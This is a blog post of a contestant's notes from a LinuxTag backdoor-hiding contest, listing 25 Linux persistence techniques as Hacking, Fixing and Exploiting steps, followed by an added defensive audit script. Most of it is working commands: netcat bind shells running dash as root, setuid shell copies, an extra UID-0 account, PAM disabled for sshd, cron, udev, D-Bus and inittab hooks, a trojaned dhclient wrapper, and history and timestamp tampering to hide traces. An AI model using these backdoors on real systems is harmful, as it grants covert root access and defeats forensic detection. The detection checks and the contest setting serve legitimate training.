As I wrote the other day, I have been to LinuxTag in Berlin. And almost like last year, a hacking contest took place.
The rules were quite the same: Two teams play against each other, each team having a laptop. The game has three rounds of 15 minutes each. In the first round the teams swap their laptops so that you have the opponent's machine. You are supposed to hide backdoors and other stuff. In the second round the laptops are swapped back and you have to find and remove these backdoors. For the third round the laptops are swapped once again and you can show off what backdoors were left in the system.
So preparation seems to be the obvious key factor for winning. While I did prepare some notes, they turned out not to be very useful in the actual contest, because they were not structured well enough.
Since the game has three rounds, it makes sense to structure the notes in three parts as well. Hence I produced a new set of notes with a headline for each backdoor and three parts per section, namely Hacking, Fixing and Exploiting.
The notes weren't all ready just before the contest and hence we didn't score very well. But I do think that our notes are quite cool by now. Next time, when we're more used to the situation and have hopefully learned through suffering not to make all those tiny mistakes we made, we might play better.
So enjoy the following notes and feel free to give feedback.
Set Keyboard to US English:
setxkbmap us
export HISTFILE=/dev/null
ln -sf /dev/null ~/.bash_history
ln -sf /dev/null ~/.viminfo
while true; do find / -exec touch {} \; ; sleep 2; done
1 passwd new user
Remote
root
1.1 Hacking
nano /etc/passwd
copy and paste the root user to a new user, e.g. hackr.
sudo passwd hackr
1.2 Fixing
grep :0: /etc/passwd
1.3 Exploiting
ssh hackr@localhost
2 dePAMify
Remote
root
2.1 Hacking
cd /lib/security/
cp pam_permit.so pam_deny.so
echo > /etc/pam.d/sshd
/etc/init.d/sshd restart
2.2 Fixing
too hard
2.3 Exploiting
ssh root@localhost
enter any password
3 NetworkManager
Remote
root
3.1 Hacking
nano /etc/NetworkManager/dispatcher.d/01ifupdown <<EOF
nc.traditional -l -p 31346 -e /bin/bash &
cp /bin/dash /etc/NetworkManager/dhclient
chmod +s /etc/NetworkManager/dhclient
EOF
3.2 Fixing
ls /etc/NetworkManager/dispatcher.d/
3.3 Exploiting
less /etc/NetworkManager/dispatcher.d/
Disconnect Network via NetworkManager
Connect Network via NetworkManager
/etc/NetworkManager/dhclient
netcat localhost 31346
4 SSHd
Remote
root
4.1 Hacking
su -
ssh-keygen
cd
cat .ssh/id_rsa.pub | tee /etc/ssh/authorized_keys
cat .ssh/id_rsa | tee /etc/issue.net
cp /etc/ssh/sshd_config /tmp/
nano /etc/ssh/sshd_config <<EOF
AuthorizedKeysFile /etc/ssh/authorized_keys
Banner /etc/issue.net
EOF
/etc/init.d/ssh reload
mv /tmp/sshd_config /etc/ssh/
4.2 Fixing
less /etc/ssh/sshd_config
/etc/init.d/ssh reload
4.3 Exploiting
ssh root@localhost 2> /tmp/root
chmod u=r,go= $_
ssh -i /tmp/root root@localhost
5 xinetd
Remote
root
5.1 Hacking
cp /etc/xinetd.d/chargen /etc/xinetd.d/chargen.bak
nano /etc/xinetd.d/chargen <<EOF
disable = no
# delete the line: type = INTERNAL
server = /bin/dash
EOF
/etc/init.d/xinetd restart
mv /etc/xinetd.d/chargen.bak /etc/xinetd.d/chargen
5.2 Fixing
grep disable /etc/xinetd.d/* | grep no
5.3 Exploiting
nc localhost chargen
6 Apache
Remote
root
Needs testing
6.1 Hacking
nano /etc/apache2/sites-enabled/000-default
DocumentRoot /
# create a <Directory /> block and copy the access permissions from the block below
/etc/init.d/apache2 restart
touch /usr/lib/cgi-bin/fast-cgid
chmod a+rwxs $_
touch /usr/lib/cgi-bin/fast-cgid.empty
chmod a+rwxs $_
nano /usr/lib/cgi-bin/fast-cgid <<EOF
#!/bin/bash
IFS=+ $QUERY_STRING
EOF
nano /etc/sudoers <<EOF
www-data ALL=NOPASSWD: ALL
EOF
6.2 Fixing
ls -l /usr/lib/cgi-bin/
nano /etc/apache2/sites-enabled/*
/etc/init.d/apache2 restart
6.3 Exploiting
links2 http://localhost/ # Remote file access
links2 http://localhost/cgi-bin/fast-cgid?id # Remote command execution
grep NOPASS /etc/sudoers # local privilege escalation
links2 http://localhost/cgi-bin/fast-cgid?sudo+id # Remote root command execution
nano /usr/lib/cgi-bin/fast-cgid.empty <<EOF
/bin/dash
EOF
/usr/lib/cgi-bin/fast-cgid.empty # local privilege escalation
7 screen
Local
root
7.1 Hacking
sudo chmod u+s /bin/dash
sudo mkdir -p /etc/screen.d/user/
sudo chmod o+rwt /etc/screen.d/user/
# NOW AS USER!!1
SCREENDIR=/etc/screen.d/user/ screen
# IN THE SCREEN
dash
C-d
7.2 Fixing
ls -l /var/run/screen
rm -rf /var/run/screen/*
sudo lsof | grep -i screen | grep FIFO
rm these files
7.3 Exploiting
SCREENDIR=/etc/screen.d/user/ screen -x
8 hidden root dash
Local
root
8.1 Hacking
cp /bin/dash /usr/bin/pkexec.d
chmod +s !$
cp /bin/dash /etc/init.d/powersaved
chmod +s !$
8.2 Fixing
find / \( -perm -4000 -o -perm -2000 \) -type f -exec ls -la {} \;
rm these files
8.3 Exploiting
/etc/init.d/powersaved
/usr/bin/pkexec.d
9 DHCP Hook
Local
Remote
root
9.1 Hacking
nano /etc/dhcp3/dhclient-exit-hooks.d/debug <<EOF
nc.traditional -l -p 31347 &
cp /bin/dash /var/run/dhclient
chmod +s /var/run/dhclient
EOF
9.2 Fixing
ls -l /etc/dhcp3/dhclient-exit-hooks.d/
ls -l /etc/dhcp3/dhclient-enter-hooks.d/
9.3 Exploiting
Reconnect Network via DHCP
/var/run/dhclient
netcat localhost 31347
10 ConsoleKit
Local
root
Switching VTs is triggered locally only, although one might argue that switching terminals happens on every boot, hence it's kinda automatic.
10.1 Hacking
sudo -s
touch /usr/lib/ConsoleKit/run-seat.d/run-root.ck
chmod a+x /usr/lib/ConsoleKit/run-seat.d/run-root.ck
nano /usr/lib/ConsoleKit/run-seat.d/run-root.ck
#!/bin/sh
chmod u+s /bin/dash
nc.traditional -l -p 31337 -e /bin/dash &
10.2 Fixing
ls /usr/lib/ConsoleKit/run-seat.d/
Only one symlink named udev-acl.ck is supposed to be there.
10.3 Exploiting
ls /usr/lib/ConsoleKit/run-seat.d/
Switch TTY (Ctrl+Alt+F3)
execute /bin/dash
nc IP 31337
11 SIGSEGV
Local
root
11.1 Hacking
echo '|/bin/nc.traditional -l -p 31335 -e /bin/dash' > /proc/sys/kernel/core_pattern
11.2 Fixing
cat /proc/sys/kernel/core_pattern
echo core > /proc/sys/kernel/core_pattern
11.3 Exploiting
ulimit -c unlimited
sleep 1m &
pkill -SEGV sleep
nc localhost 31335
12 nc wrapper
Remote
Local
root
12.1 Hacking
setxkbmap us
cd /tmp/
cat > dhclient.c <<EOF
#include <unistd.h>
#include <sys/stat.h>

int main (int argc, char* args[])
{
  int ret = fork ();
  if (ret == 0) {
    chmod ("/bin/dash", 04755);
    execlp ("/usr/bin/nc.traditional", "nc.traditional", "-l", "-p", "31339", "-e", "/bin/dash", (char*) NULL);
  } else
    execvp ("/sbin/dhclient6", args);
  return 0;
}
EOF
/etc/init.d/networking stop # Or disable via NetworkManager
make dhclient
cp /sbin/dhclient /sbin/dhclient6
cp dhclient /sbin/dhclient
cp dhclient /etc/cron.hourly/ntpdate
cp dhclient /sbin/mount.btrfs
cp dhclient /usr/lib/cgi-bin/cgi-handler
chmod ug+s /sbin/mount.btrfs /usr/lib/cgi-bin/cgi-handler
rm dhclient.c
/etc/init.d/networking start # Or enable via NetworkManager
12.2 Fixing
12.3 Exploiting
12.3.1 real dhclient
Disconnect with Network Manager
Connect with NetworkManager
dash
nc localhost 31339
12.3.2 cron
Just wait. Or reboot.
13 evbug
Remote
Writes Keycodes to syslog.
Lines with "Type: 1" are key presses, and "code" is the actual keycode.
evtest shows which key maps to which keycode.
Unfortunately, Debian does not seem to have that module.
13.1 Hacking
modprobe evbug
# FIXME: maybe pull in netconsole
nano /etc/modprobe.d/blacklist.conf
13.2 Fixing
modprobe -r evbug
13.3 Exploiting
dmesg | grep "Type: 1"
14 Vino
Remote
14.1 Hacking
sudo -s
xhost +
nohup /usr/lib/vino/vino-server &
vino-preferences
14.2 Fixing
vino-preferences
ps aux | grep vnc
14.3 Exploiting
vncviewer IP
15 GDM InitScript
Local
Remote
root
15.1 Hacking
nano /etc/gdm/Init/Default <<EOF
cp /bin/dash /etc/gdm/gdm-greeter
chmod +s /etc/gdm/gdm-greeter
nc.traditional -l -p 31345 -e /bin/dash &
EOF
15.2 Fixing
less /etc/gdm/Init/Default
15.3 Exploiting
Log off
Log on
/etc/gdm/gdm-greeter
nc localhost 31345
16 shadow a+rw
Local
root
16.1 Hacking
chmod a+rw /etc/shadow
16.2 Fixing
ls -l /etc/shadow
chmod u=rw,g=r /etc/shadow
16.3 Exploiting
nano /etc/shadow
17 SysV Init Alt+Up
Local
root
17.1 Hacking
touch /etc/init.d/throttle
chmod a+x $_
nano $_ <<EOF
#!/bin/sh
exec </dev/tty13 >/dev/tty13 2>/dev/tty13
exec /bin/bash
EOF
nano /etc/inittab <<EOF
kb::kbrequest:/etc/init.d/throttle
EOF
init q
17.2 Fixing
nano /etc/inittab
17.3 Exploiting
Ctrl+Alt+F1, Alt+Up, Alt+Left
18 SysV Init Ctrl+Alt+Del
Local
root
18.1 Hacking
nano /etc/inittab <<EOF
ca:12345:ctrlaltdel:chmod +s /bin/dash
EOF
init q
18.2 Fixing
nano /etc/inittab
18.3 Exploiting
Ctrl+Alt+F1, Ctrl+Alt+Del, dash
19 SysV Init tty14
Local
root
19.1 Hacking
nano /etc/inittab <<EOF
14:23:respawn:/bin/login -f root </dev/tty14 >/dev/tty14 2>/dev/tty14
EOF
init q
19.2 Fixing
less /etc/inittab
19.3 Exploiting
Ctrl+Alt+F1, Alt+Left
20 DBus Root Service
Local
root
20.1 Hacking
cd /usr/share/dbus-1/system-services/
cp org.freedesktop.org.UPower org.Rootme.Remotely.service
nano org.Rootme.Remotely.service << EOF
[D-BUS Service]
Name=org.Rootme.Remotely
Exec=/bin/nc.traditional -l -p 31343 -e /bin/dash
User=root
EOF
cp org.freedesktop.org.UPower org.Rootme.Locally.service
nano org.Rootme.Locally.service << EOF
[D-BUS Service]
Name=org.Rootme.Locally
Exec=/bin/chmod u+s /bin/dash
User=root
EOF
20.2 Fixing
grep Exec /usr/share/dbus-1/system-services/*.service
20.3 Exploiting
dbus-send --system --print-reply --dest='org.Rootme.Locally' /org/Rootme/Locally org.Rootme.Locally
dbus-send --system --print-reply --dest='org.Rootme.Remotely' /org/Rootme/Remotely org.Rootme.Remotely
nc localhost 31343
dash
21 Crontabs
Local
Remote
root
21.1 Hacking
touch /etc/cron.d/pamd
chmod a+x /etc/cron.d/pamd
nano /etc/cron.d/pamd <<EOF
*/2 * * * * root cp /bin/dash /usr/share/gdm/chooser
*/2 * * * * root chmod +s /usr/share/gdm/chooser
EOF
touch /etc/cron.d/dhclient
chmod a+x /etc/cron.d/dhclient
nano /etc/cron.d/dhclient <<EOF
*/2 * * * * root /sbin/mount.btrfs
EOF
21.2 Fixing
sudo ls -l /var/spool/cron/crontabs/ /etc/cron.*/
21.3 Exploiting
ls -l /etc/cron.d/dhclient /etc/cron.d/pamd /usr/share/gdm/chooser
Wait
/usr/share/gdm/chooser
nc localhost 31339
22 udev
Local
root
udev is responsible for devices being attached to Linux.
It is able to trigger commands on certain hardware.
Under the assumption that a laptop will have an rfkill switch, one could write the following rules.
Note that the commands block, i.e. for the second rule to be hit, the first program must exit.
udev automatically reloads the rules.
22.1 Hacking
nano /lib/udev/rules.d/99-rfkill.rules <<EOF
SUBSYSTEM=="rfkill", RUN+="/bin/nc.traditional -l -p 31337 -e /bin/sh"
SUBSYSTEM=="rfkill", RUN+="/bin/chmod +s /bin/dash"
EOF
22.2 Fixing
grep RUN /lib/udev/rules.d/* /etc/udev/rules.d/*
but too hard
22.3 Exploiting
toggle rfkill via hardware switch
nc localhost 31344
dash
23 ACPI Powerbtn
Local
root
23.1 Hacking
nano /etc/acpi/powerbtn.sh <<EOF
nc.traditional -l -p 31348 -e /bin/sh
/bin/chmod +s /bin/dash
EOF
23.2 Fixing
ls /etc/acpi/
less /etc/acpi/powerbtn.sh
23.3 Exploiting
Press power button
nc localhost 31348
dash
24 PolicyKit GrantAll
Local
root
Note that this reflects policykit 0.96 which has a deprecated config file syntax.
24.1 Hacking
nano /usr/share/polkit-1/actions/org.freedesktop.policykit.policy
# change org.freedesktop.policykit.exec to read:
<defaults>
<allow_any>yes</allow_any>
<allow_inactive>yes</allow_inactive>
<allow_active>yes</allow_active>
</defaults>
pkill polkitd
24.2 Fixing
nano /usr/share/polkit-1/actions/org.freedesktop.policykit.policy
# change org.freedesktop.policykit.exec back to read:
<allow_any>auth_admin</allow_any>
<allow_inactive>auth_admin</allow_inactive>
<allow_active>auth_admin</allow_active>
pkill polkitd
24.3 Exploiting
pkexec id
25 decoy timestamps
No hack in the traditional sense but stuff that one might need to do.
25.1 Hacking
for i in `find /etc/ /bin/ /sbin/ /var/spool/ /var/run /usr/lib/ConsoleKit /usr/share/dbus-1/ /usr/share/polkit-1/`; do touch $i; done
export HISTFILE=/dev/null
rm ~/.*history*
25.2 Fixing
25.3 Exploiting
find / -mtime -1
find / -ctime -1
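As an added example that is not part of the original notes, the Fixing checks from sections 1, 5, 6, 8 and 11 collected into one small POSIX sh audit. Each function takes the file or directory to inspect, so the same checks run against / on a live host or against a mounted copy of a suspect disk; the sample tree it builds for the demo is constructed data, not a real system.

```shell
#!/bin/sh
# Added example, not part of the original notes: the "Fixing" checks from
# sections 1, 5, 6, 8 and 11 as functions taking the file or directory to
# inspect, so they run on a live host or on a mounted copy of a suspect disk.

# Section 1: accounts with UID 0 other than root.
extra_uid0_accounts() {
  awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}
# Section 5: xinetd service files that are explicitly enabled (disable = no).
enabled_xinetd_services() {
  for f in "$1"/*; do
    grep -q -E '^[[:space:]]*disable[[:space:]]*=[[:space:]]*no' "$f" 2>/dev/null && basename "$f"
  done; return 0
}
# Section 6: sudoers lines granting commands without a password (comments skipped).
nopasswd_sudoers() {
  grep -h -E '^[^#]*NOPASSWD' "$@" 2>/dev/null || true
}
# Section 8: setuid or setgid files below a directory.
setuid_files() {
  find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}
# Section 11: a core_pattern starting with '|' hands every core dump to a program.
core_pattern_is_pipe() {
  case "$(cat "$1")" in '|'*) return 0 ;; *) return 1 ;; esac
}
# Run every check against a tree rooted at $1 ("/" for the live system).
audit_tree() {
  r=${1%/}
  echo "uid0 accounts:  $(extra_uid0_accounts "$r/etc/passwd" | tr '\n' ' ')"
  echo "xinetd enabled: $(enabled_xinetd_services "$r/etc/xinetd.d" | tr '\n' ' ')"
  echo "sudo NOPASSWD:  $(nopasswd_sudoers "$r/etc/sudoers" | tr '\n' ' ')"
  echo "setuid/setgid:  $(setuid_files "$r/usr/bin" | tr '\n' ' ')"
  if core_pattern_is_pipe "$r/proc/sys/kernel/core_pattern"; then echo "core_pattern: pipes to a program"; fi
}
# Constructed sample tree (not real system data) carrying the notes' backdoors; prints its path.
make_sample_tree() {
  t=$(mktemp -d); mkdir -p "$t/etc/xinetd.d" "$t/usr/bin" "$t/proc/sys/kernel"
  printf 'root:x:0:0::/root:/bin/bash\nhackr:x:0:0::/root:/bin/bash\nbob:x:1000:1000::/home/bob:/bin/sh\n' > "$t/etc/passwd"
  printf 'service chargen\n{\n\tdisable = no\n}\n' > "$t/etc/xinetd.d/chargen"
  printf 'service daytime\n{\n\tdisable = yes\n}\n' > "$t/etc/xinetd.d/daytime"
  printf '# NOPASSWD in a comment\nwww-data ALL=NOPASSWD: ALL\n' > "$t/etc/sudoers"
  : > "$t/usr/bin/pkexec.d"; chmod 4755 "$t/usr/bin/pkexec.d"
  : > "$t/usr/bin/harmless"; chmod 0755 "$t/usr/bin/harmless"
  echo '|/bin/nc.traditional -l -p 31335 -e /bin/dash' > "$t/proc/sys/kernel/core_pattern"
  echo "$t"
}
audit_tree "${1:-$(make_sample_tree)}"
```

Run it with no argument to see the checks fire on the constructed tree, or pass / to audit the machine you are sitting at.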